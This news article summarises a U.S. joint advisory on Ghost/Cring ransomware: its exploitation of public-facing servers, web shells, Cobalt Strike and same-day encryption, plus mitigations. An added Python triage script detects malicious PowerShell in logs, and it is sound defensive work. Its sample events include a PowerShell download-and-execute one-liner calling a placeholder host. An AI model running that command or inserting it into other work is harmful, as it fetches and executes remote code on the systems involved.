U.S. Authorities Issue Joint Advisory on Ghost/Cring Ransomware Threat
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint advisory alerting organizations to the rise of Ghost ransomware attacks. This financially motivated cybercriminal group, also known as Cring, has been responsible for ransomware incidents in over 70 countries, including in its own home country. Authorities warn that Ghost ransomware attacks primarily target entities operating internet-facing services with outdated software and firmware, making them highly susceptible to exploitation.
Ghost first gained attention in early 2021 after it exploited vulnerabilities in Fortinet’s FortiGate VPN devices. Since then, the group has continuously adapted its tactics, changing ransomware payloads and ransom note text frequently. This has resulted in the group being identified by several aliases, including Crypt3r, Hello, Phantom, Strike, Wickrme, HsHarada, and Rapture. Their ability to modify their attack methods makes them a persistent threat to organizations across various sectors, including critical infrastructure, healthcare, education, government, small and medium-sized businesses, and religious institutions.
The ransomware group primarily gains access to systems by exploiting known vulnerabilities in public-facing applications. Their recent attacks have focused on weaknesses in Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange. Once initial access is achieved, Ghost actors typically upload web shells onto compromised servers and use Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware. This malware allows the attackers to implant ransomware on the system, leading to encryption and subsequent ransom demands.
One of Ghost’s distinguishing characteristics is its speed. Unlike some ransomware operators who maintain long-term access within a compromised network before deploying malware, Ghost often executes its ransomware attacks on the same day that access is gained. This rapid deployment indicates that the group prioritizes quick financial gains over prolonged infiltration.
The ransom notes left by Ghost frequently threaten to leak or sell stolen data if victims do not comply with payment demands. However, investigations by the FBI suggest that large-scale data exfiltration is not a consistent aspect of the group’s operations. While some data has been downloaded to Cobalt Strike Team Servers or transferred to external platforms like Mega.nz, the volume of exfiltrated information is typically limited, often less than hundreds of gigabytes. This suggests that, in many cases, the group relies more on encryption and the threat of exposure rather than actual data theft to pressure victims into paying ransoms.
To mitigate the risks associated with Ghost ransomware attacks, CISA, the FBI, and MS-ISAC urge organizations to adopt several defensive measures. These include maintaining regular offline backups of critical systems to prevent data loss, applying security updates as soon as they become available to patch known vulnerabilities, and enabling phishing-resistant multi-factor authentication to reduce unauthorized access. Organizations are also advised to monitor and, if necessary, restrict the use of PowerShell and other scripting tools to limit the ability of attackers to execute malicious commands.
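As an added illustration, not part of the advisory or this article, of the "monitor PowerShell" recommendation applied to the intrusion chain described above (web shell on an exposed server, then PowerShell used to download and execute a second stage), the following Python triage scores PowerShell script block log entries for that behaviour. It assumes script block logging is enabled and events have been exported as dicts with host, user and script keys; the service-account prefixes, weights and sample events are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Heuristics for the chain the advisory describes: a web shell on an exposed server
# launches PowerShell to fetch and run a second stage. Detection logic only.
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                             r"Invoke-RestMethod|Start-BitsTransfer", re.IGNORECASE)
INVOKE_EXPR = re.compile(r"Invoke-Expression|\biex\b", re.IGNORECASE)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
STEALTH_FLAGS = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b",
                           re.IGNORECASE)
# Assumed service identities a web shell would inherit; adjust to your environment.
WEB_IDENTITIES = ("iis apppool\\", "nt authority\\network service")

@dataclass
class Finding:
    host: str
    user: str
    score: int
    reasons: list

def score_script_block(script: str, user: str = "") -> tuple:
    """Score one logged script block; higher means more like a staging command."""
    score, reasons = 0, []
    checks = [(DOWNLOAD_CRADLE, 2, "download cradle"), (INVOKE_EXPR, 2, "invoke-expression"),
              (ENCODED_CMD, 3, "encoded command"), (STEALTH_FLAGS, 1, "hidden/noprofile flags")]
    for pattern, weight, label in checks:
        if pattern.search(script):
            score, reasons = score + weight, reasons + [label]
    if "download cradle" in reasons and "invoke-expression" in reasons:
        score += 2                      # fetch-and-run in one block is the classic one-liner
        reasons.append("download-and-execute chain")
    if user.lower().startswith(WEB_IDENTITIES):
        score += 2                      # PowerShell running as the web app's identity
        reasons.append("run as web server identity")
    return score, reasons

def triage(events: list, threshold: int = 3) -> list:
    """Return Findings scoring at or above threshold, highest first."""
    findings = [Finding(e["host"], e.get("user", ""), *score_script_block(e["script"], e.get("user", "")))
                for e in events]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)

# Constructed sample events in the assumed shape (not real log data).
SAMPLE_EVENTS = [
    {"host": "sp-web01", "user": "IIS APPPOOL\\SharePoint", "script":
     "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"host": "cf-app02", "user": "CORP\\cfsvc", "script": "powershell -enc " + "QUFB" * 12},  # placeholder base64
    {"host": "fs01", "user": "CORP\\admin", "script": "Get-ChildItem C:\\Backups | Sort-Object LastWriteTime"},
]
```

Calling `triage(SAMPLE_EVENTS)` returns the two flagged hosts in score order and drops the benign backup listing; tune the weights and threshold against your own baseline before alerting on them.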
The advisory provides a detailed list of indicators of compromise, along with specific tactics, techniques, and procedures used by the Ghost group. Cybersecurity experts recommend that organizations review this information closely and take immediate action to strengthen their defenses. Given the evolving nature of ransomware threats, staying vigilant and proactive in cybersecurity practices remains essential.
U.S. authorities continue to monitor the Ghost ransomware group and urge organizations that suspect they have been targeted to report incidents to law enforcement agencies. By sharing threat intelligence and implementing security best practices, organizations can reduce the likelihood of falling victim to ransomware attacks.